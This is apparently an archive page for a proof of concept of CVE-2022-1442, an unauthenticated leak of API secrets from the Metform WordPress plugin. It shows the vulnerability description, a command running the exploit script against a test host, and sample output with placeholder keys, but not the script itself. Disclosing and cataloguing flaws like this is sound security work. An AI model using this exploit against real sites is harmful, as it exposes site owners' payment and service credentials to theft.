Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-1442 PoC — Metform Elementor Contact Form Builder <= 2.1.3 - Sensitive Information Disclosure

Source
https://github.com/RandomRobbieBF/CVE-2022-1442
Associated Vulnerability
Title:Metform Elementor Contact Form Builder <= 2.1.3 - Sensitive Information Disclosure (CVE-2022-1442)
Description:The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.
Description
WordPress Plugin Metform <= 2.1.3 - Improper Access Control Allowing Unauthenticated Sensitive Information Disclosure
Readme
# CVE-2022-1442
WordPress Plugin Metform &lt;= 2.1.3 - Improper Access Control Allowing Unauthenticated Sensitive Information Disclosure

# Description
The is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs such as PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA etc.

POC
---
```
 bash metform.sh http://wordpress.lan
{
  "form_title": "New Form # 1691056894",
  "success_message": "Thank you! Form submitted successfully.",
  "capture_user_browser_data": "1",
  "store_entries": "1",
  "entry_title": "Entry # [mf_id]",
  "count_views": "1",
  "redirect_to": "",
  "user_email_subject": "",
  "user_email_from": "",
  "user_email_reply_to": "",
  "user_email_body": "",
  "admin_email_subject": "",
  "admin_email_to": "",
  "admin_email_from": "",
  "admin_email_reply_to": "",
  "admin_email_body": "",
  "mf_mailchimp_list_id": "",
  "mf_slack_webhook": "",
  "mf_recaptcha_version": "recaptcha-v2",
  "mf_recaptcha_site_key": "sfsdffd",
  "mf_recaptcha_secret_key": "sfddsf",
  "mf_recaptcha_site_key_v3": "",
  "mf_recaptcha_secret_key_v3": "",
  "mf_mailchimp_api_key": "asdadasdsaddas",
  "input_names": "Example: [mf-inputname]",
  "ckit_opt": [],
  "aweber_opt": [],
  "mp_opt": []
}
```
File Snapshot

 [4.0K]  /data/pocs/077bdb6186c4119b3b1d94e38d1bcbbdf7a5214f
├── [ 11K]  LICENSE
├── [ 786]  metform.sh
└── [1.4K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →